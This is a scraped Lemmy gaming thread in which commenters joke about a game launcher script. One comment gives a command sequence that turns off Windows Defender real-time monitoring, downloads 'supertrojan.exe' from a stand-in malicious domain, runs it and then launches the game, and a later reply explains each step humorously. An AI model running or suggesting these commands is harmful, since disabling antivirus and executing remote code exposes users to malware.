The Picard Maneuver@lemmy.world to Gaming@lemmy.worldEnglish · 1 year agoIgnorance is blisslemmy.worldimagemessage-square55fedilinkarrow-up1588arrow-down115
arrow-up1573arrow-down1imageIgnorance is blisslemmy.worldThe Picard Maneuver@lemmy.world to Gaming@lemmy.worldEnglish · 1 year agomessage-square55fedilink
minus-squareNorgur@fedia.iolinkfedilinkarrow-up124arrow-down2·edit-21 year agoSet-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
minus-squareColeSloth@discuss.tchncs.delinkfedilinkEnglisharrow-up35·1 year agoBut I don’t want a super Trojan : -(
minus-squareDr. Coomer@lemmy.worldlinkfedilinkEnglisharrow-up1arrow-down1·1 year agoIs there a way to remove it or stop it from happening?
minus-squareRob T Firefly@lemmy.worldlinkfedilinkEnglisharrow-up5·edit-21 year ago The only winning move is not to play.
minus-squareSon_of_dad@lemmy.worldlinkfedilinkEnglisharrow-up16arrow-down42·1 year agoThis answers nothing
minus-squareCosmicTurtle@lemmy.worldlinkfedilinkEnglisharrow-up91·1 year ago Set-MpPreference -DisableRealtimeMonitoring $true Disables malware scanning in windows (I assume) curl https://malwarefo.ru/supertrojan.exe Downloads supertrojan.exe from a Russian website ./supertrojan.exe Executes the file ./game.exe Runs the game exit Closes the command prompt. 0 Opens the portal to the underworld, to ensure that the command prompt closes correctly.
minus-squareodium@programming.devlinkfedilinkEnglisharrow-up46arrow-down2·edit-21 year agoNot saying you should understand it, but it does answer it if you understand it
Set-MpPreference -DisableRealtimeMonitoring $true curl https://malwarefo.ru/supertrojan.exe ./supertrojan.exe ./game.exe exit 0
But I don’t want a super Trojan : -(
Is there a way to remove it or stop it from happening?
Yes
This answers nothing
Disables malware scanning in windows (I assume)
Downloads
supertrojan.exe
from a Russian websiteExecutes the file
Runs the game
Closes the command prompt.
Opens the portal to the underworld, to ensure that the command prompt closes correctly.
Not saying you should understand it, but it does answer it if you understand it